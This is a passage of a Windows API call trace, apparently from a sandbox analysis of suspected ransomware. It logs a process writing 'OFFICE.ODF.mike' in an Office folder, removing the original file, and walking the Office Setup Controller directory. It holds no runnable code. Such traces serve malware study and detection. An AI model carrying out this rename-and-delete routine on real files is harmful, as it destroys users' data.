lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.957] SetFilePointer (in: hFile=0x288, lDistanceToMove=399360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x61800 [0051.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.959] SetFilePointer (in: hFile=0x288, lDistanceToMove=409600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x64000 [0051.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0051.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.961] SetFilePointer (in: hFile=0x288, lDistanceToMove=419840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x66800 [0051.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.964] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.970] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.970] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.971] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.971] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.972] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.975] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.975] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0051.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0051.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0051.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0051.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0052.511] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0052.512] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0052.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", dwFileAttributes=0x80) returned 1 [0052.512] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf")) returned 0 [0052.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0052.514] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0052.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8371520, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8371520, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8964c20, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x419580)) returned 1 [0052.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpFilePart=0x0) returned 0x4b [0052.515] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike", lpFilePart=0x0) returned 0x50 [0052.515] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf.mike")) returned 1 [0052.518] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpFilePart=0x0) returned 0x40 [0052.518] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\", lpFilePart=0x0) returned 0x41 [0052.518] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe8371520, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe898ad80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe8371520, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe898ad80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 1 [0052.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 0 [0052.518] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0052.518] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpFilePart=0x0) returned 0x4f [0052.518] CoTaskMemAlloc (cb=0x20c) returned 0x502980 [0052.518] GetSystemDirectoryW (in: lpBuffer=0x502980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.519] CoTaskMemFree (pv=0x502980) [0052.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpFilePart=0x0) returned 0x4f [0052.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpFilePart=0x0) returned 0x4f [0052.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\", lpFilePart=0x0) returned 0x50 [0052.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0052.521] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.521] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0052.521] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel.en-us", cAlternateFileName="EXCEL~1.EN-")) returned 1 [0052.521] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Groove.en-us", cAlternateFileName="GROOVE~1.EN-")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPath.en-us", cAlternateFileName="INFOPA~1.EN-")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6b277670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x8b7b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ODeploy.exe", cAlternateFileName="")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office.en-us", cAlternateFileName="OFFICE~1.EN-")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32.en-us", cAlternateFileName="OFFICE~2.EN-")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32.WW", cAlternateFileName="")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote.en-us", cAlternateFileName="ONENOT~1.EN-")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302b0500, ftCreationTime.dwHighDateTime=0x1cba073, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x302b0500, ftLastWriteTime.dwHighDateTime=0x1cba073, nFileSizeHigh=0x0, nFileSizeLow=0x709b68, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSETUP.DLL", cAlternateFileName="")) returned 1 [0052.522] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5de00200, ftCreationTime.dwHighDateTime=0x1cac9ac, ftLastAccessTime.dwLowDateTime=0x598fccf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5de00200, ftLastWriteTime.dwHighDateTime=0x1cac9ac, nFileSizeHigh=0x0, nFileSizeLow=0xb9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSetupPS.dll", cAlternateFileName="")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.en-us", cAlternateFileName="OUTLOO~1.EN-")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17eefe00, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0xbe99ad60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x17eefe00, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6904ef00, ftCreationTime.dwHighDateTime=0x1ca912c, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6904ef00, ftLastWriteTime.dwHighDateTime=0x1ca912c, nFileSizeHigh=0x0, nFileSizeLow=0x3d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0052.523] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5db14d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5e95d10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5e95d10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint.en-us", cAlternateFileName="POWERP~1.EN-")) returned 1 